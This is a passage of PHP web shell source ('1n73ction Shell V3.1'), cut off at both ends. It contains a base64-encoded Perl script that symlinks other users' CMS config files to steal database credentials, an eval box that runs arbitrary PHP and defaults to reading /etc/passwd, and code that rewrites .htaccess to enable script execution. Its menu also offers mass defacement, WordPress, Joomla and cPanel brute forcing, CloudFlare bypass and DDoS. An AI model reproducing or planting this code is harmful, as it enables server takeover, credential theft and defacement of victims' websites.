nLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7\'; \r\n?>\r\n<html><head><link rel="SHORTCUT ICON" href="http://png-3.findicons.com/files/icons/1935/red_gems_vol_2/128/r2_dragon.png"><title>=[ 1n73ct10n privat shell ]=</title>\r\n<script type="text/javascript">\r\nfunction tukar(lama,baru){\r\n\tdocument.getElementById(lama).style.display = \'none\';\r\n\tdocument.getElementById(baru).style.display = \'block\';\r\n}\r\n</script>\r\n<style type="text/css">\r\nbody{\r\n\tbackground:#000000;;\r\n}\r\na {\r\ntext-decoration:none;\r\n}\r\na:hover{\r\nborder-bottom:1px solid #00ff00;\r\n}\r\n*{\r\n\tfont-size:11px;\r\n\tfont-family:Tahoma,Verdana,Arial;\r\n\tcolor:#00ff00;\r\n}\r\n#menu{\r\n\tbackground:#111111;\r\n\tmargin:8px 2px 4px 2px;\r\n}\r\n#menu a{\r\n\tpadding:4px 18px;\r\n\tmargin:0;\r\n\tbackground:#222222;\r\n\ttext-decoration:none;\r\n\tletter-spacing:2px;\r\n\t-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;\r\n}\r\n#menu a:hover{\r\n\tbackground:#191919;\r\n\tborder-bottom:1px solid #333333;\r\n\tborder-top:1px solid #333333;\r\n}\r\n.tabnet{\r\n\tmargin:15px auto 0 auto;\r\n\tborder: 1px solid #333333;\r\n}\r\n.main {\r\n\twidth:100%;\r\n}\r\n.gaya {\r\n\tcolor: #00ff00;\r\n}\r\n.inputz{\r\n\tbackground:#111111;\r\n\tborder:0;\r\n\tpadding:2px;\r\n\tborder-bottom:1px solid #222222;\r\n\tborder-top:1px solid #222222;\r\n}\r\n.inputzbut{\r\n\tbackground:#111111;\r\n\tcolor:#00ff00;\r\n\tmargin:0 4px;\r\n\tborder:1px solid #444444;\r\n\r\n}\r\n.inputz:hover, .inputzbut:hover{\r\n\tborder-bottom:1px solid #00ff00;\r\n\tborder-top:1px solid #00ff00;\r\n}\r\n.output {\r\n\tmargin:auto;\r\n\tborder:1px solid #00ff00;\r\n\twidth:100%;\r\n\theight:400px;\r\n\tbackground:#000000;\r\n\tpadding:0 2px;\r\n}\r\n.cmdbox{\r\n\twidth:100%;\r\n}\r\n.head_info{\r\n\tpadding: 0 4px;\r\n}\r\n.jaya{ font-family: ;}\r\n\r\n.b374k{\r\n\tfont-size:30px;\r\n\tpadding:0;\r\n\tcolor:#444444;\r\n}\r\n.b374k_tbl{\r\n\ttext-align:center;\r\n\tmargin:0 4px 0 0;\r\n\tpadding:0 4px 0 0;\r\n\tborder-right:1px solid #333333;\r\n}\r\n.phpinfo table{\r\n\twidth:100%;\r\n\tpadding:0 0 0 0;\r\n}\r\n.phpinfo td{\r\n\tbackground:#111111;\r\n\tcolor:#cccccc;\r\npadding:6px 8px;;\r\n}\r\n.phpinfo th, th{\r\n\tbackground:#191919;\r\n\tborder-bottom:1px solid #333333;\r\nfont-weight:normal;\r\n}\r\n.phpinfo h2, .phpinfo h2 a{\r\n\ttext-align:center;\r\n\tfont-size:16px;\r\n\tpadding:0;\r\n\tmargin:30px 0 0 0;\r\n\tbackground:#222222;\r\n\tpadding:4px 0;\r\n}\r\n.explore{\r\nwidth:100%;\r\n}\r\n.explore a {\r\ntext-decoration:none;\r\n}\r\n.explore td{\r\nborder-bottom:1px solid #333333;\r\npadding:0 8px;\r\nline-height:24px;\r\n}\r\n.explore th{\r\npadding:3px 8px;\r\nfont-weight:normal;\r\n}\r\n.explore th:hover , .phpinfo th:hover{\r\nborder-bottom:1px solid #00ff00;\r\n}\r\n.explore tr:hover{\r\nbackground:#111111;\r\n}\r\n.viewfile{\r\nbackground:#EDECEB;\r\ncolor:#000000;\r\nmargin:4px 2px;\r\npadding:8px;\r\n}\r\n.sembunyi{\r\ndisplay:none;\r\npadding:0;margin:0;\r\n}\r\n\r\n</style></head>\r\n<script language=\'javascript\'>\r\nif (document.all||document.getElementById){\r\nvar thetitle=document.title\r\ndocument.title=\'\'\r\n}\r\nvar data="Us3 Y0ur br41n biTch ! ! !";\r\nvar done=1;\r\nfunction statusIn(text){\r\ndecrypt(text,22,22);\r\n}\r\nfunction statusOut(){\r\nself.status=\'\';\r\ndone=1;\r\n}\r\nfunction decrypt(text, max, delay){\r\nif (done){\r\ndone = 0;\r\nrantit(text, max, delay, 0, max);\r\n} \r\n}\r\nfunction rantit(text, runs_left, delay, charvar, max){\r\nif (!done){\r\nruns_left = runs_left - 1;\r\nvar status = text.substring(0,charvar);\r\nfor(var current_char = charvar; current_char < text.length; current_char++){\r\nstatus += data.charAt(Math.round(Math.random()*data.length));\r\n}\r\ndocument.title = status;\r\nvar rerun = "rantit(\'" + text + "\'," + runs_left + "," + delay + "," + charvar + "," + max + ");"\r\nvar new_char = charvar + 1;\r\nvar next_char = "rantit(\'" + text + "\'," + max + "," + delay + "," + new_char + "," + max + ");"\r\nif(runs_left > 0){\r\nsetTimeout(rerun, delay);\r\n}\r\nelse{\r\nif (charvar < text.length){\r\nsetTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));\r\n}\r\nelse\r\n{\r\ndone = 1;\r\n}\r\n}\r\n}\r\n}\r\nif (document.all||document.getElementById)\r\nstatusIn(thetitle)\r\n</script>\r\n\r\n<body onLoad="document.getElementById(\'cmd\').focus();">\r\n<div class="main">\r\n<!-- head info start here -->\r\n<div class="head_info">\r\n<table ><tr>\r\n<td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k"><img src="http://www.fbvideo.16mb.com/files/1n73ction.png" /></span></a></td></tr><tr><td><b>1n73ction Shell V3.1 [ Special Edition ]</b></td></tr></table></td>\r\n<td><?php echo $buff; ?></td>\r\n</tr></table>\r\n</div>\r\n<!-- head info end here -->\r\n<!-- menu start -->\r\n<center><div id="menu">\r\n<a href="?<?php echo "y=".$pwd; ?>"><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII=\' height="18" width="34"></a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">Shell</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=php">Eval</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=sql">Mysql</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=dump">Database Dump</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">Php Info</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">Net Sploit</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">Upload</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">E-Mail</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=sqli-scanner">SQLI Scan</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=port-sc">Port Scan</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=dos">Ddos</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=tool">Tools</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=python">python</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=symlink">Symlink</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=config">Config</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=bypass">Bypass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cgi">CgiShell</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cgi2012">CGI Telnet 2012</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=domain">Domain</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jodexer">Joomla IndChange</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=vb">VB IndChange</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset">Wordpress ResPass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset">Joomla ResPass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs">WHMCS Decoder</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=zone">Zone-H</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=mass">Mass Deface</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=wpbrute">Wordpress BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jbrute">Joomla BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=brute">Cpanel BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=bypass-cf">Bypass CloudFlare</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=adfin">Admin Finder</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=hash">Password Hash</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=hashid">Hash ID</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=string">Script Encode</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=whois">Website Whois</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jss">Joomla Server Scanner</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cms_detect">Cms Detector</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=tutor">Tutorial & Ebook</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=about">About</a>\r\n<a href="?<?php echo "y=".$pwd;\t?>&amp;x=logout">Log-Out</a>\r\n\r\n\r\n</div></center>\r\n<!-- menu end -->\r\n\r\n<?php\r\n@ini_set(\'display_errors\', 0);\r\nif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'php\')){ ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">\r\n<table class="cmdbox">\r\n<tr><td>\r\n<textarea class="output" name="cmd" id="cmd">\r\n<?php\r\nif(isset($_POST[\'submitcmd\'])) {\r\n\techo eval(magicboom($_POST[\'cmd\']));\r\n}\r\nelse echo "echo file_get_contents(\'/etc/passwd\');";\r\n?>\r\n</textarea>\r\n<tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>\r\n</table>\r\n</form>\r\n\r\n<?php } \r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'sql\'))\r\n    {\r\n    ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=sql" method="post">\r\n<?php\r\necho "<center/><br/><b><font color=#00ff00>+--==[ Mysql Interface ]==--+</font></b><br><br>";\r\n  mkdir(\'mysql\', 0755);\r\n    chdir(\'mysql\');\r\n        $akses = ".htaccess";\r\n        $buka_lah = "$akses";\r\n        $buka = fopen ($buka_lah , \'w\') or die ("Error cuyy!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\nAddType application/x-httpd-php .cpc\r\n";    \r\n        fwrite ( $buka , $metin ) ;\r\n        fclose ($buka);\r\n$sqlshell = \'PD8NCiRQQVNTV09SRCA9ICJyb290X3hoYWhheCI7DQokVVNFUk5BTUUgPSAieGhhaGF4IjsNCmlmICggZnVuY3Rpb25fZXhpc3RzKCdpbmlfZ2V0JykgKSB7DQoJJG9ub2ZmID0gaW5pX2dldCgncmVnaXN0ZXJfZ2xvYmFscycpOw0KfSBlbHNlIHsNCgkkb25vZmYgPSBnZXRfY2ZnX3ZhcigncmVnaXN0ZXJfZ2xvYmFscycpOw0KfQ0KaWYgKCRvbm9mZiAhPSAxKSB7DQoJQGV4dHJhY3QoJEhUVFBfU0VSVkVSX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfQ09PS0lFX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfUE9TVF9GSUxFUywgRVhUUl9TS0lQKTsNCglAZXh0cmFjdCgkSFRUUF9QT1NUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfR0VUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfRU5WX1ZBUlMsIEVYVFJfU0tJUCk7DQp9DQoNCmZ1bmN0aW9uIGxvZ29uKCkgew0KCWdsb2JhbCAkUEhQX1NFTEY7DQoJc2V0Y29va2llKCAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKTsNCglzZXRjb29raWUoICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICk7DQoJZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgaGVpZ2h0PTEwMCU+PHRyPjx0ZD48Y2VudGVyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9Mj48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjx0YWJsZSBjZWxscGFkZGluZz0yMD48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjxoMT5NeVNRTCBJbnRlcmZhY2UgQnkgUzRNUDRIPC9oMT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Ykc5bmIyNWZjM1ZpYldsMD5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxwYWRkaW5nPTUgY2VsbHNwYWNpbmc9MT5cbiI7DQoJZWNobyAiPHRyPjx0ZCBjbGFzcz1cIm5ld1wiPkhvc3RuYW1lIDwvdGQ+PHRkPiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9aG9zdG5hbWUgdmFsdWU9J2xvY2FsaG9zdCc+PC90ZD48L3RyPlxuIjsNCgllY2hvICI8dHI+PHRkIGNsYXNzPVwibmV3XCI+VXNlcm5hbWUgPC90ZD48dGQ+IDxpbnB1dCB0eXBlPXRleHQgbmFtZT11c2VybmFtZT48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjx0cj48dGQgY2xhc3M9XCJuZXdcIj5QYXNzd29yZCA8L3RkPjx0ZD4gPGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzd29yZD48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nRW50ZXInPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1yZXNldCB2YWx1ZT0nQ2xlYXInPjxicj5cbiI7DQoJZWNobyAiPC9mb3JtPlxuIjsNCgllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJZWNobyAiPC9jZW50ZXI+PC90ZD48L3RyPjwvdGFibGU+XG4iOw0KCWVjaG8gIjxwPjxociB3aWR0aD0zMDA+XG4iOw0KCWVjaG8gIjwvY2VudGVyPjwvdGQ+PC90cj48L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbG9nb25fc3VibWl0KCkgew0KCWdsb2JhbCAkdXNlcm5hbWUsICRwYXNzd29yZCwgJGhvc3RuYW1lICwkUEhQX1NFTEY7DQoJaWYoJGhvc3RuYW1lID09JycpDQoJCSRob3N0bmFtZSA9ICdsb2NhbGhvc3QnOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl91c2VybmFtZSIsICR1c2VybmFtZSApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIsICRwYXNzd29yZCApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIsICRob3N0bmFtZSApOw0KCWVjaG8gIjxNRVRBIEhUVFAtRVFVSVY9UmVmcmVzaCBDT05URU5UPScwOyBVUkw9JFBIUF9TRUxGP2FjdGlvbj1iR2x6ZEVSQ2N3PT0nPiI7DQp9DQoNCmZ1bmN0aW9uIGVjaG9RdWVyeVJlc3VsdCgpIHsNCglnbG9iYWwgJHF1ZXJ5U3RyLCAkZXJyTXNnOw0KCWlmKCAkZXJyTXNnID09ICIiICkgJGVyck1zZyA9ICJTdWNjZXNzIjsNCglpZiggJHF1ZXJ5U3RyICE9ICIiICkgew0KCQllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9NT5cbiI7DQoJCWVjaG8gIjx0cj48dGQ+UXVlcnk8L3RkPjx0ZD4kcXVlcnlTdHI8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8dHI+PHRkPlJlc3VsdDwvdGQ+PHRkPiRlcnJNc2c8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8L3RhYmxlPjxwPlxuIjsNCgl9DQp9DQoNCmZ1bmN0aW9uIGxpc3REYXRhYmFzZXMoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJFBIUF9TRUxGOw0KCWVjaG8gIjxoMT5EYXRhYmFzZXMgTGlzdDwvaDE+XG4iOw0KCWVjaG8gIjxmb3JtIGFjdGlvbj0nJFBIUF9TRUxGJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWNyZWF0ZURCPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9ZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBEYXRhYmFzZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGhyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz01PlxuIjsNCgkkcERCID0gbXlzcWxfbGlzdF9kYnMoICRteXNxbEhhbmRsZSApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBEQiApOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRkYm5hbWUgPSBteXNxbF9kYm5hbWUoICRwREIsICRpICk7DQoJCWVjaG8gIjx0cj5cbiI7DQoJCWVjaG8gIjx0ZD4kZGJuYW1lPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWxpc3RUYWJsZXMmZGJuYW1lPSRkYm5hbWUnPlRhYmxlczwvYT48L3RkPlxuIjsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcERCJmRibmFtZT0kZGJuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgRGF0YWJhc2UgXCckZGJuYW1lXCc/JylcIj5Ecm9wPC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kdW1wREImZGJuYW1lPSRkYm5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHVtcCBEYXRhYmFzZSBcJyRkYm5hbWVcJz8nKVwiPkR1bXA8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gY3JlYXRlRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2NyZWF0ZV9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbGlzdERhdGFiYXNlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2Ryb3BfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCWxpc3REYXRhYmFzZXMoKTsNCn0NCg0KZnVuY3Rpb24gbGlzdFRhYmxlcygpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkUEhQX1NFTEY7DQoJZWNobyAiPGgxPlRhYmxlcyBMaXN0PC9oMT5cbiI7DQoJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24